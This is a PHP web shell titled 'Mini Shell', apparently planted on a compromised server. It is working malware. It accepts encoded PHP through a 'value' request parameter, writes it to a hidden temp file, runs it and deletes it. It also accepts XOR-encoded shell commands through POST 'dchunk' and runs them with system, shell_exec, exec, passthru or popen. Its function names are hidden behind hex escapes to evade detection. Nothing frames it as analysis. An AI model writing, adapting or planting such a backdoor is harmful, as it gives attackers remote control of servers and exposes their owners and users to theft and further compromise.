Mini Shell
<?php if(array_key_exists("val\x75e", $_REQUEST)){ $pset = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/var/tmp", getenv("TEMP"), getcwd()]); $flg = hex2bin($_REQUEST["val\x75e"]); $object = '' ; $n = 0; do{$object .= chr(ord($flg[$n]) ^ 50);$n++;} while($n < strlen($flg)); foreach ($pset as $res) { if ((is_dir($res) and is_writable($res))) { $hld = sprintf("%s/.ent", $res); if (@file_put_contents($hld, $object) !== false) { include $hld; unlink($hld); die(); } } } }
$system_core1 = "\x73yste\x6D";
$buffer_cache = "h\x65\x78\x32b\x69n";
$system_core7 = "\x70c\x6C\x6Fse";
$system_core3 = "\x65xe\x63";
$system_core4 = "\x70\x61\x73\x73thru";
$system_core5 = "p\x6Fp\x65n";
$system_core6 = "\x73\x74r\x65\x61m_ge\x74\x5F\x63o\x6Eten\x74\x73";
$system_core2 = "sh\x65\x6Cl\x5F\x65\x78ec";
if (isset($_POST["\x64chunk"])) {
function module_controller ( $fac , $pset ){
$hld = '' ;
$o=0;
do{
$hld.=chr(ord($fac[$o])^$pset);
$o++;
} while($o<strlen($fac));
return $hld;
}
$dchunk = $buffer_cache($_POST["\x64chunk"]);
$dchunk = module_controller($dchunk, 73);
if (function_exists($system_core1)) {
$system_core1($dchunk);
} elseif (function_exists($system_core2)) {
print $system_core2($dchunk);
} elseif (function_exists($system_core3)) {
$system_core3($dchunk, $res_fac);
print join("\n", $res_fac);
} elseif (function_exists($system_core4)) {
$system_core4($dchunk);
} elseif (function_exists($system_core5) && function_exists($system_core6) && function_exists($system_core7)) {
$pset_hld = $system_core5($dchunk, 'r');
if ($pset_hld) {
$pgrp_ent = $system_core6($pset_hld);
$system_core7($pset_hld);
print $pgrp_ent;
}
}
exit;
}